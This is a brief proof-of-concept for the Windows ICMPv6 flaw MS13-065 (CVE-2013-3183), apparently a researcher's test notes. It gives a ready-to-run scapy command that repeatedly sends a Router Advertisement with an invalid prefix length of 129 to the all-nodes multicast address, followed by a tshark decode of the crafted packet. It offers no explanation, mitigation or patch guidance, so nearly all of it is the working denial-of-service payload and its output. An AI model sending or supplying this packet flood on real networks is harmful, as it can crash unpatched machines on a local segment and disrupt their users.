ms13-065 - CVE-2013-3183
system crash if an attacker send a maliciously crafted ICMPv6 Router Advertisement packet that contains an invalid prefix length field


$ sudo scapy
>>> sendp(Ether()/IPv6(dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix="2001:db8:bad:cafe::",prefixlen=129), loop=1, inter=0.5)
....^C
Sent 4 packets.

$ tshark -r capture-scapy-CVE-2013-3183.pcap -V
Internet Control Message Protocol v6
    Type: Router Advertisement (134)
    Code: 0
    Checksum: 0x127e [correct]
    Cur hop limit: 0
    Flags: 0x08
        0... .... = Managed address configuration: Not set
        .0.. .... = Other configuration: Not set
        ..0. .... = Home Agent: Not set
        ...0 1... = Prf (Default Router Preference): High (1)
        .... .0.. = Proxy: Not set
        .... ..0. = Reserved: 0
    Router lifetime (s): 1800
    Reachable time (ms): 0
    Retrans timer (ms): 0
    ICMPv6 Option (Prefix information : 2001:db8:bad:cafe::/129)
        Type: Prefix information (3)
        Length: 4 (32 bytes)
        Prefix Length: 129
        Flag: 0xc0
            1... .... = On-link flag(L): Set
            .1.. .... = Autonomous address-configuration flag(A): Set
            ..0. .... = Router address flag(R): Not set
            ...0 0000 = Reserved: 0
        Valid Lifetime: 4294967295 (Infinity)
        Preferred Lifetime: 4294967295 (Infinity)
        Reserved
        Prefix: 2001:db8:bad:cafe:: (2001:db8:bad:cafe::)